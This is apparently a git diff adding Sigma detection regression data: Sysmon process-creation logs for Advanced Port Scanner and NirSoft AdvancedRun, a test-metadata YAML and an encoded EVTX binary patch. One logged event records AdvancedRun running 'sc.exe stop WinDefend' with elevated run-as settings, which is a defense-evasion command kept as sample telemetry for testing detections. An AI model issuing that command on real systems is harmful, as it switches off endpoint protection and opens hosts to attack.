"\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe\" /portable \"C:/Users/SwachchhandaP/Downloads/\" /lng en_us", + "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=4FDABE571B66CEEC3448939BFB3FFCD1,SHA256=8B9C7D2554FE315199FAE656448DC193ACCBEC162D4AFFF3F204CE2346507A8A,IMPHASH=31E3E9D3DDE3C0C0F2C167B89B8E269C", + "ParentProcessGuid": "14207D89-FF2E-68F9-1911-000000003F02", + "ParentProcessId": 3972, + "ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp", + "ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp\" /SL5=\"$E0634,19769177,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_Port_Scanner_2.5.3869.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml new file mode 100644 index 000000000..2586d9498 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml @@ -0,0 +1,13 @@ +id: 998b5845-1623-4b2f-b9d1-bfc402172d45 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 54773c5f-f1cc-4703-9126-2f797d96a69d + title: PUA - Advanced Port Scanner Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx new file mode 100644 index 0000000000000000000000000000000000000000..1c79d4e63af9ce79a250923cf4cad8091f47ea40 GIT binary patch literal 69632 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

@y8iX;Rl@Ww zB~G2Q+~P{)iyw@oY)O#=XY4JwqLD!pUyA6IV@NI%+pPC>`bTVA0$0kV{2jY^`gvc> z6j!Hs#e?s?T`zg<_Ym9G%i)gaVX&ruQXW0;D@JGeg1_k^{`Xi>&~0b+~S#EJ9 z!T}e&TkI)%m@JmbE7>mdoA9743K}Xr8}&Ic5Kjeu)X3s`_`HbgO;1d|`+!Vwb&9_@ zZ`{oX2-jWDXKT2=C0*>ChY2;8S3D}> zSM>1E6jvm*C6!ll$-`4@@vn;FdO;k$BfipqeaBa_)Whu*`}MxF>Xjs%pKeJ@?SwH+9Vv z*LI2pxZWzCX=C3IoU`2GO68_Sl1C-T^e}!Cd41Ev$SzSUUK4o_(QNcLzQ zEh?`UMO^n?`NZ2pGR3u>Vgar-!gRS_&RK48MGmQb4Hs^XTwRJHxDwTXYeR}O`C%m3 zs%zvWh>ei)hT^zh9C4k0@%`t0F;iTfVq~Cwv$q+2ZOHx3%v6>}qi_E|&1Xb!ue@ z&RK48#m@yRd|c`}SWwFif-6;VvJvK0;XzqcgH1+~iIJLghZ6Snl8Ed5Ke%L3OQ!PL zPO(4_FPGo6ziPkES#EK~=OKqkzlGOd@pLWkk3Wo6CC3k%mX|%j`QhXBp=>#g}S+vEjnaNm$T{t>yjyBAx7<p`kO8@SVR4=)yHOwt5Yn*^}X5=X-eU8hMB{nbeBoaGi*^1fJ3x_HsWAV(L3 z;Y#(~!@War&T@+@*gV{ygY_b>kIu!C5~mW~ zFsB6Fj7@FQdn_)}Opcg)6vg#lBd!CcKf8SIOmTIJk%9Kj1IkNGQ7+Lr%Pp=*o^>N4 zbsz^?bj1u7eqLd>E*Xwti#Z=_Yu$>-Z;AflE8}?XbZ^gBev~P$PO%-(xHC`lINp+t zbs4_y_uBHUAN(d$ zT%BUWDYvY9#c)s2JxC`NPgxZgC}MLGti{nNLNm>Rl4n^$o5z4-a38IayYp zv$=lwTlmODas6(@^$!mX`TGYl#nmYm;yOU~b(VCobCzRVtz+M^PDmtC4DyJ)qGO43 z@P9qGh}C6Y4!x$xHnp7+diZ-0*ITbV_1K3q#nmZB2HH38sTc7;&Es&+a*OK@wXgpc z$8+je_uINDQ(T?mo*SQj^`67}9`eiQuetBoZ(iE{x3aH`6z4c+xy2PZrR#+l2g^w$ zL%!Ggn`~wk@heq#WSF>zxgX5Ps?%9ke=VVhzaMcuYyF6Z4O_F!`#Z%+x4wMYU0ajz zV7hHhmZ~3dk@T>0mRnqjZ|H@=#*$qkeg!k@?Wa$Ih=-ahc?h&LRRLlm>b4fUa&=Mr z`h$q;(7jeSW{ay+91=MgFn#B`dD6d*t8Xjy#6radeerTHfM{gQ!It6bCz3Ncc|a=?-AECJN3>OSEpDCSLZCZ zxb9HD>AHyP*!lPG+xLwu;~b~h>!C|t?DIwvE=;$r$pmq9m-?HWvmE0}hYQsTwQpc9;`D#6zbkF)ThYwwQ{134eG^#PyurpB$bou1>KOuFhF*aV76h1Z(T{ zSnnZoa4e5Vg`GHuimR{vgM{NnvC12J^rx2SGrd0I+WOV{iP_@n6e9!e8{~DVa*57a zZgHjCo4FhyON>fhf|W#wb8O8#ykJ}ThYGt%D{G7xzWBxTo)(RBeiX;^{Ns~J+2ZOH z+X0O`j;nK)TU_ZpETU=Scl74->AFIi+@A8T-Wpz4R|HUc*)Y5H6EZ!8|6(#b+ zH%46NbUA8M-?y{$hn?btmpkrz_FrF_c>9A73}3N&*q;5BmzXA8owMBHN}iB+Zs*392nNxnzWQvR8 zdUM3}=rspF_G+fMI>pF9`{oMGX}&==);Y^9uFRsM-vPgvm43+V)9Yk@6Fw1D9CS4O zF6Ixj$GX+#RoR*%MR8pl$Md5JD_oAn=Q!k8jmRnr$o0zRZ6w3PE ztlvaDy1o8NhQd5#jxpnk`T&*{{8^uZ{i3+u5=V1m-Ot+ok}0lEu}}{msJ^w+C9lp| zZgHi8YU^wvv1nhS9_q2^VV@IA?S?E9^&BE2x`(OTQi(+im*^k| zQ(T>5JD_prl3mr?Bpd6Tb{PF!r!$$2*Q~3H;`;N5>yQiH?|6QuxH`o`T%XgAye+B@!8yw< zuJpk0qEcsT`J4ROJV`p7Y+WwuIb@z#y@|Xqy^HwIU|e$E)h{BhE0@+Eb3vxKI>ka< zAJ`>?f%@$R=Pb9l64QVko-et4;v6)x#jo_Rk?ki7LAH=c)_%)@$cP*i63c#3dA&8_ zx@PLz^{X?*)hQO@I$Jh|U3RqB^Ww{1yH#}MAr%Q?#} zu4q)N)!`XqRY3`R3a<1;5b=;>v|sDsDKIYz8*3~6fN@cIT_16M`qs96f0`+-PBAjj zzNyz-x+&7b&RK48-Jx;L?QuM>d+nrCf1W9>PO%-(xbvRu>kaaqoU`2GN=^_7WlN@k z$~jSw>0$CtXkRi*oP$4XzdOk60GnZnUtGez-VsOhs>fFjTAwMdPO(rAPgm^vIpzMH zv)tlJ_0@bPI?~X?po{NhaSqlKTx|tYy2foial9@3XF8$CJQmf%cSc;NKKA9Q4PCOd zuTJru7yr0ve3vAg^b*^)WTI^A49%%?&T@;Z{jw3VYQIeenm)%0zscsXbHskVjtnE6 zGDt1m{$wXg<|Td^ah-n9@6T+^6j!Gh8ED_kQqG@sL!7hR;<`ia>wm=Ytetn-ZU<+I zt5a+TH14qe@LI{NbCz3Nnd?f7!@4hYz@Uez-dJ6oY?4`3>N(~uQ%NU=r85p&mY6vN}z^lXI3^T!~s(`;w>?UkO#3od&SqQL%C&e^ ztm|(ptuX_S*vHmFEoxskL|h-<=eDaSWs0j)EX1{5bDF314Z%6fEw1>&M4@Dakv_{P zQByU)iJozeA;F-|oLB01bU;zN19xn0QCxo&aXqeb(9V-H#nmYm;<{13Fh3OSoaGi* z{G~C%h|Hm_Neg}+=b&TJzBY4%Y!s4fT@pMGph_%MqQB|xi0j%TzIAc7xH`o`T<55+ zK2f;|=Pb9lk|DGi=ghPrroqc4uZX;YIK46CpKQ$u=5Jt&S>wsN5^V+JqVjrA#I?5e zjXRIZR9>CpeFImW`~7aq8-I94?XcT#c=<~5661uebCz3Nv8$}LMRa4@*L)#5|LI4h z8v-c>RjcPvsYO=F594dmlUSm^>DLk0E4Q3}@-dm>>J$s*^|zAMvvv!?Im<1s)Wxl@ zl>f1+bcmB*vPc#wwt5bkf25f?9eBZHC3qTG&uc_+`}&^|*WCu+JAHblxH`o`T+iA) zgi6J*&RK48rDxb`In1&GIjX6wKLD;+UF<9MIJ3EUP1s?RZmK#fKK*B*o9HwjngEVsClWuW$k%rV!-`b=3J1bM~sQl|rPu=OrfG&O#+ zbx|-Mx+t#qMqH0v_0<_CXNs#+EX4H=<%WAp7dvOU#g%FdnBqC%0TH31kFC#?CrZ&sGzf(MI*0>(m)F$DBblaBxPUt%M!_HZ5 zaRnRZ(Se`MQfC!#=4c?VWcSg{$fxzjV2y2UA7mL{nkcr!`u_JvTz~nxRP5!GOj7Ev|U>=IN-m~hWQ9XNP zX~|5@m8&iq**8;pb&7?!u2t`FlXAq)S#EK~)5S{S z4WnbNVuO65hpE?CoP*zsZbp`|uh>+Zt4?*GM4#z@MO^31Y?$0XQ(T>5WT1UBPJYv7 z)#{wH+~UeSDqBaGS~?iod|0YD=viAOoI0KT1{TuHY<9dWuH+i3w?*~vBXK4Q_hpK!Q+#CW6aRIu{HB9mXKQ(hsnW&HS#EK)_3)5Ko4-LPDcF%)qF!Sw zh|u{&B*dr8)1m{B+#>ULY(1HxxIP+jy>7$7$7PGFQ!K>w24Pw$J?xz27FXnzc*Q!= zEPIHi1w$m5Iv)Noz7beckL5U5QG2B_fHW7y^$!u(if6jq_}`hzt5b{&v~T{R7-yoe zbN)m{W_U!b`+`4A{*XPqCwl&|tHe9JK(;8Ze~jaK;^d)!dOlNJ zonoQ9u2pZ-4SG3exy6;p6`u%vY~B@`m5c=PidSWIbu=>a%DGh34QJ-H+e#BfaeXY} zdd8%G@9|2exH`o`Tn8#Yynl5F&RK48rEiJ&hTK2@qiOM@Ob^@YmgFjsO!Jn(oLP2Q zTED79oU<|F`sBvR-?*S>miZ>9c-(|HhF{P#39ae2Eol>`7fKI1XSv0do)$bMG%Yig zkw|*MOoq zxy6+n16f06+TcT3h1L7QiCH;DEJVhMJ?8S@G23dH*jZLEE~U`6q6kvrCxur+@yekG@b zl+sH<9+8|db$8-dvQhMyl8G!TuWfNOw;Vg~*;_Nk)hQOrYd`7X-^so@XSv1Iq7>^r zqkjzyv9uP+;um3GvA*`Z4RoX8FH5GkRs|H#x;?dVS%Z z<9a1wubtSoB?F~{S%26$%Pp>Ci$I6mpv_k&!{qCklF_FYKplWMh;>7dW;8WDi~M8# zrV{nnCnBz6e|*%-^E1WODHh^7KsCD6eL`@~a*Qkb7f+a9iUdPCn#@PC+%b|%&X9g_ ztJ8rfbLq%r(B+11E-J52MqFRpWzpbMGR4&?7UFt`^8QmbSJFAlEw1Dlh-SzgQpo{1 zvWM0$K|O$M1d%HBb7ljuC7xwY09qWaT|!=;in#9ny{miubEddD#X?;B$+q?rw$52@ zaV1-X9t9oi_a`m|XZ$8smq3QWk;ulPTcnrzoz0n~`d$Lprz5U4-|F|`{r$4EuTF7D zuF|+zTCz>dtVE7kJ)Ss;EJjiL`fS8?_}t}NPtFuqr+D=Pk9=v#{z=&BLAGrP zxK7cWI_E66xZ)w<+cM*k`~nsf&Ft$VlC2=lq2meNZ0iCM=`?Deh!=fa!f$#m;@a5t zup!-tWht*taq=Z2Hgy}8guByiTQXAl;kBB};hg0bSA1Zq=6J=}SYjI1b+^1fE5m~; z7S(10kc(heGd?t{Cvr75x~RPVPsFuv>*zi`GR4&?Mh4n9Bjq!FPBk6pEVsDsQ2Y9P z9M6CH=CbAA9iFAUI>npsy>jSxhbLjseQev(-wCB>!a2(=t~QIA=#-ow@=Ek-T}^0N z^2YeX_{>B+_Y=$m7u2}3M)~1^>Pd9Ya*OK@ zmDd;JXukRQ%&i}c%~D>SVz;xtbHxW^ldvS+wk6Y)Yhpf~bCz3NEyq9?KN5?);x!Si z62D?W$yLx>%s>1lI-JN&(bYt!jO8YZ+SivNu2Y}=(w1$R;_4I&<#mdB*2XE{Y`G+@6w`oyaUyj3i!#*P}3I}E>uTJsa zr%$|No8EW|>7+C!l+V zNQbAQ#QIIIL|pIge)aW9rnoxAYtI`wGdVB`gU@H%mTZ-*u2u}|oaGi*s&eFbslTCF z(X@1uf-pW2wRP*EuxgLZT&HseElur*u9*^jrkf+KwTlnFts+xgonoOLo*}=fx8fY< zEVsDsP`~NbIIJ7`t=Q%6#w_))Q!K=Ft9+)QILA3F<0{$w%z4Du;;{Dm`TD{4WQwa( zTz2*eH*RQ5!prGadRVxgt~kdz%Pp>GS7ti0raStSd=vY0tD%jV-+|vm^_|=zJx%Ct zbTs`?^rVtoEb2FHiMV#XrhfkWnd0gc3voSAKGUP>nQ+c>iz_qYn7s^|)Z3`5gS7vy zFY7viE45a9DeAGzy22|aL%}Rqt}Ke{)`;sFJ?oczkSVTCu@Kjd@|pO(X6G!oxKc&O z7iPAN{qm9ZGFkkJ4~5@E4V_#+`6lM>;6c+lgU5{jRAT+6*CVc<|HsSgtDCa4uTHTL z*XPt{I!|j%IA^)Vl?aFIg3W&fIVy0-r}@M9yyX4KKUjCM_4%W<(ZJS2UNAo=!dc#w zN1!|c6PuL5%g#WPAiR=s&N4e(f z^jkl@>zXss43q=P0p);lKslfsP!1>ulmp5E<$!WPIiMU^mjnHCQ<<5Chr~(u<^C@* zCx8MMZV>tAxl@0(ZpQ0GU^xdLNPWj2?bevcZE=zRjEejq;=dy@fbgS$AvXH?);eiE zi8A@Q6=m}CrWgNDyl{qn0%21{^c=(We|sRwyNk-0_wr)e-}TOi5O)B1zEqSC|5=1A%Ob88WePD{alMG}L$Zo{3;6GlHhjBq)+QUqd-4Qu1=S@o7YL@1@be#+#+9O_!*T=T`m~~RJ zxc93#V(fCv=Facb%l*h=3@n>P^=AzUWL;B4V&SGbiA6#UvJU~Sr{A=FoBWy=Z5Etb zz`bx&gG3@2bGPBbb@7RBMP(2X*;aEVk}y(OZo$PZUO(-BG$N->TRdc{IW3w7#GPT_Uh2CcElF_2@16xn!WO(Z}r(WJr=p ziRFB_sb18{ze@)=L^Wu7Gg%mKD_0=G(MQ znq!<4*zC!#?h+Plb7Gy!Bx+=Lxq5XTWw=S?k6zr43S2ORpEm{B<~>0=(3(P8>i>Sb z*JsBOF^8{5MO@-BPOWU(%e`@Mc*f(cV?fh(iPwd8n(oBOn4gcJi)IjW3>|5~(9K5M zDWOQnHX3I&Hr$bgxM9>hx&n!_V))*|mi*aGUlh@p@JU+g3_kLv~bKx*lI`~UQxGhZHzy*~TwPyb<~ z=?|H)NLFyn*q+MS!%pZQI=PZ^j}e|Xj34~z{(c@5Os>t7;YKtG8~Rtg z^zY2a-iD@J0ms}>4mW}##%=N9nx?loHxzYrH`#_8!_v$&cY0}V&gUN-91{|5tdlt7 z@Acxd^*!pN=u&(bO@sb$Bf3#pS_Z&v*0ON&4L3$Bq{$*aA9?KAOKa^FZj4pnk9{Cb zfTx^n!j0Q1#O2Jz0m;#O5pm--ZjV<_^2e*^PV^g6F^yvZ@#n=TpWoA#r)cg;EYQ?y@mU(s&9n9fxht zagT*OKW?!6NO~oiN30!T%@|?j(%bsI!`83N=**|}kD?o^q_=B`Im5xQGxy*62uZL;IK-}R zagUD$UU%dAyUo1WG)F zhu8x++^ohC%Qbrfs~yYp!lyF%o)--|(URvt?f4p>_L)5WX+}{)yG~7@eOY4Z{>u_6 zax8+c32!aH=K#6Lxzpxsb6ZBd;JnBjY%JSKX~X4|Dbt2*eJ>g^OReK*yAe=049=bg zhsyU=_Vt&ae`}`sg#nC0tTeoTN`^zIIeXH1w8#*0OUhA zBP@-Pltv%zL#Zj;={G&L2j_hzP6lTOLCXom;%MwfevC;mu?;c0@y*~)JMQ)2KWobB zMVT4gPvhH$uoOa>zSsQsBdiOt+i{0^befo1T=$zYnQI4*E~F#X8KfiS%%3zI1iywb zW=Rt%JBqkTo2q3<%59Zo$3bScj?B1GS@8_=EGHwTOnH@L!^$$@yOF-4EO-JDHcGFEzDtWsT|5med$1YBeN7!u&yL{G?0&3i5KTnQ99)MxUeo} zreAbaHt8SMv(q`4^%SfR226#ycDbTYvAeC0lnbNDWHA%H< z%Bq%LS+l}^WAKRLep5oCt-9CdrPjPu=SjI$w^Tll0?BtMKt0Dnprtk>4IdBWd8kyL zRZ7Uj77F=m9_YpVEh9BoUBB{@aGvL$Bz-bKQG2QSRV`gt-M9TTmXNsLR$a@D7f%X5 z7O1Pi4~n_JamoBKNY#X6DS_XPgVK2d2PO9R;J5<^rSNi+`7-W5>BaL)=3GZpKJP|u zZTLNmwR{hLlUP-^nl*NZSzCYo#Olmj6i?(p_&Fegc8zT3!@Ml)=4&gdFJV>MK2AP$|l}{*^ssg(`IPb=<oe&orBaGzEXE+t)PuVjlN)77D=SmR>_KRUN!f+7pnS?2b|F^Mlx*eE zjGH9!4zuhR8)H6jVa<^mX>AP2FMndG_f$;6yYd401vhCLQQh%8i1>;*U zjx@gcsHP8+PlCQGLYddF&HLxI6E!3UfuABYk5QZ-!C_wSNbx)Rzd>i_o%AmG22P9L z&3_mf#IFB4`S*ad((mHaAh7g1cq5A!K4Z+g_tNj&xsEFJuHCE?s(i;z0l4D3^*xAC z_MN)o8ztU}E51?c-F6M}js6|Q_{Luy|Gfi#eB+~vZz#Uu*KmqLt;a7}cyGixQy0o$ zWpEm|URHdAprPU$MZKmBDwoG5^0Kz#8-?Ri@r|qhukelMu)-&v(T5|2gIWapalC+I zYw(Q}r21aSXYEGX{TlEMs|tG{{6w^NvRMnHZDJb^p%}&$^;!7toBC4@^Pmh(O^H^} z%lEeJ`0|{RCf|_yQ45=6aZU+Hs4Qs(ILIRMPT>8kUz4E_J4k@*BXTEV+3*B7MT8{_ zwN+|5P)En&IU7m0WJ=7d53f(PtG`1y3TaM2%C>rDn~6A8*CLLh!ur<^bDa|~Y;l;&i#Yit4#ixo zy@O&dcxn~fDHv!;bxJDQ8T>-(lzc9rQ}Qnzm+SqQ%ae+^DCSZq+bQPaEbO8o+9Q>; zYN%RsqiRcsbhW5fxp(BA^+VN^sZNQrHX%BuIwiC~QJoTu!cEdC`4F%b>XZ<7aXKaY zaQ--st-xF;r%`KzG9YEMXMwrA>FJd4p(4K@V2^O-w3so!C;Ao)KaF>9u~B6370s2 zd&^Lb4xk#8<}9l53{Z_XJXGU{c&Sr6RAUK9@G7ti+PQEylsSBz{zMC`eC)TD2ty@` z_5oKRMN6QT@ASFT$Mr%Ts3AdX5w@b+sel>`l*Us=9w!RGDB~gLzPM$L{JtJ1lFx;&ydl$wVQz7eXK66BV&Y25|=B z5Yz;+bP;`^jsd-=Sgw?{+88!>tvj`c0yZ1|ohGhj z=g(3!I831yHXD`7zh0OI_krLJ6iJ{?)IuOC#a$oVewo(Zf%*sZR6!jD?kYho1p2PX z2DB%rkHDQAsG(qOGPqAD_jsVC1g$)1pFy87)&~T`xVuCOcWGNh9~RV(;2E_cXj8(k zwf3M61#L9Ab4GqAP^Kq!w7m#wPf!Pf`WwvC?n1#GE4cfG-F=kWAk-nD&x-*=8?`5R z#+uq4X4Gb5^K3Spcp?Af!!*8(^Uo=!p_qnZ8j5Lb7}E%PH+lK*P8VPrk1M93n1*5+ zifJgOu>oJ7YO{d>qc$7M*t-KhOUn2it)+Jp`Z%%PO{^?O?TOz6rtzAGX+)Z8iD{^J zllA?*IDF-L;T!7Rqz_1mdN;{?CE9A84JT@-cN083)w>BCbvH$=>-D?A5XCnX-`Fs| z5%g~I+JRTL`E@paL-7s8Hx%E%1gq8|Y8?U&%)__90(>#d!Mb}AR_Zxi(}RNUNukyu z^jkWKzOVvMnmL?R#y4u|-NfP>*1JhJkPhM-SAcK4>fsx4ydtfYZo7Inah3(8eX_Ko z=Ul+y5RO`Ckf?VP^=@*lUYY&)N3G@(f02|b%!R-F>nDN)QtF_#Tv zF3$$+WTqbbLdcJ~d{{9T#at9~QOrekN>ryry_*1R+cfVccf&qr5XV6rCvec4>`gdU za8%>n^`8EfVupKhq)Y# zILxJ3hhY@{Md)W_5@;js2hPE_YR+Iw)7Wf%9#;+{$a{b#Ewr*=dEC2!wi5K$YV+=s z^TsDCQ<6&hiseD?vGk(R2CuGJAetkvT{w<(92h!or<)TJZ7T8;w_B`GZXTtO+7 zdAJWW-40HrQQoxSg#WtT_`A*D@4&T{Zi`FI1zK%bP9yI$(7@B^ZTEq@CvkQb?Kz6y zQJnXKlf>fgIkr0U3cTI$Jw3XpCZERQyEo)dd_W~Wj9lK*GJ*IGn zP+IWNGYVr^@2yNhdPo6%!*btH?sLkWT}csh=_z4Z!<|yOFDXm4USU}lOW>DWpf6ie zK-(Oymz5x$MOe*fCMPn5Y*M z)fmCZ&|N;>_AVc_@Xbo}!ue+9J`0qoMuA@Z*h4R#+U8`cTIeT~@=DqZ>8uM!C**2+ zZdKo`L`mrFB?p9|R%nF!W>w#;h1ObmbaEe%39ARUnO;(yfFbIeRZ)!`RuXClqo_s% z?%iVMK!?~csuA?fdh)aP7oZxCDypHVhN2o6TZ(GnJ)wF@Q9BsmSSK+at}I6IN|Gn#)eUiTKZhOh|6?IrO@?;L0_mj|npIg(sFK6FTEByv~@Sqg}Z7t||gmw}cv?FaHQV8k7-Hf^F zgf&7tV$=44RyDndkqlT{(4K)FRtFH5b_}#2q8E`)gtHuLQ;|e^MH+rFkp{Qu7xm4m zNQ3G(z%ELyHm(tA2>NFI{XY*CAPpB4X;7p=kp@K?6lqYTL6L^dL>g-8o7Ex>^vz0t zm~BSC;S`XDfA^4vpEcGJX|VS0^TyuR?O2hw+8BnUzXEFo?(?9&S!-#tp}twwH*0x~ zjjgcRaN>pfW>xJ8m;|Zzgkl=ksyz|(&3fhg&-|-jd*Xs(8j5KsrlFXIVj7BRD5kNQ zm_{vqvnGAMS-GPiwI}WartxncrZKmtmY9b6W-XK)ThOg0uqP?^RC5^5_14)?->lS8 bQQxe!^Udl+4fV~c_=e&ew2uC{(b@Q4SZ?nz literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json new file mode 100644 index 000000000..441bba366 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:19:13.088214Z" + } + }, + "EventRecordID": 650834, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:19:13.085", + "ProcessGuid": "14207D89-0121-68FA-6E11-000000003F02", + "ProcessId": 6448, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe", + "FileVersion": "1.51", + "Description": "Run a program with different settings that you choose.", + "Product": "AdvancedRun", + "Company": "NirSoft", + "OriginalFileName": "AdvancedRun.exe", + "CommandLine": "AdvancedRun.exe /EXEFilename \"C:\\Windows\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096", + "ParentProcessGuid": "14207D89-00ED-68FA-6611-000000003F02", + "ParentProcessId": 700, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + 